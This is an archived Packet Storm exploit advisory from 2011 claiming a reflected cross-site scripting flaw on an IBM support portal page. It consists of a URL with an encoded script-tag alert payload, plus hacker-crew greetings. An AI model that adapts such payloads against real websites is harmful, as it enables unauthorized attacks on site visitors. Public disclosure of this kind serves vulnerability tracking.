IBM.com Cross Site Scripting

2011-11-12T00:00:00
ID PACKETSTORM:106876
Type packetstorm
Reporter Ryuzaki Lawlet
Modified 2011-11-12T00:00:00

Description

                                        
                                            `# Exploit Title: ibm.com Cross Site Scripting Vulnerability  
# Date: 12/11/2011 - 04:00am  
# Author: Ryuzaki Lawlet  
# Website: http://jusryuz.blogspot.com  
# Tested On: WinXP  
# Platform: -  
# Email: ryuzaki_l@y7mail.com  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable : http://www-01.domain.com/[path]/[pat]/portal.page?loc=en_US  
  
[$] Preview Sites:  
  
[~] http://www-01.ibm.com/support/electronicsupport/portal.page?loc=en_US%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS+By+Ryuzaki%22%29%3C/SCRIPT%3E%22%3E  
  
[XSS]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# wo.0t?? Ryuzaki with you  
:D  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
# Greetz: Misa Cyb3rSec, Ben Cyb3rSec, Xay Cyb3rSec, AntuWebHunt3r, Alex Newbie3vilC063s, PK Newbie3vilC063s,  
Black_List Rival  
ReD John, CyberFalconz Crew  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
#[Cyb3rSec Crew + MyHex Crew + Newbie3vilc063s + Malaysian Crew + CYBER 4RMY + T3 Ð Ha©Ke® + M4tr1xCh40s Cr3w]  
  
# Special To : Putera Army - Rileks Crew , H3x4 Crew & Newbie3vilC063s  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`